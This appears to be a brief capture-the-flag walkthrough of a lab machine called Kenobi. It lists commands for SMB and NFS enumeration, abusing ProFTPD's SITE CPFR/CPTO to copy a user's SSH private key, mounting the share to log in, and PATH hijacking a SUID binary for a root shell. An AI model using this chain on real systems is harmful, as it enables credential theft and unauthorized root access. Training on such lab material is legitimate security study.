Kenobi

January 11, 2024

smbclient -L 10.10.103.177

smbclient \\\\10.10.103.177\\anonymous

View the log.txt then we can see some id_rsa information

sudo nmap -sSUC -p 111 10.10.103.177

showmount -e 10.10.103.177

nc 10.10.103.177 21

Use exploit db to search for exploits about ProFTPD located in port 21

This will copy the file id_rsa to /var/tmp

nc 10.10.103.177 21

SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa

Then after that we will mount that directory to ours

First make dir in /tmp

sudo mkdir attacker
sudo mount -o rw 10.10.82.198:/var/tmp /tmp/attacker

Change the permission to 600 cuz that's what rsa wants

Then just ssh to the kenobi user

ssh -i id_rsa kenobi@10.10.82.198

cd /tmp
echo /bin/bash > curl
chmod 777 curl
export PATH=/tmp:$PATH
menu

We copied the /bin/sh shell, called it curl, gave it the correct permissions and then put its location in our path.

This meant that when the /usr/bin/menu binary was run, its using our path variable to find the "curl" binary..

Which is actually a version of /usr/sh, as well as this file being run as root it runs our shell as root!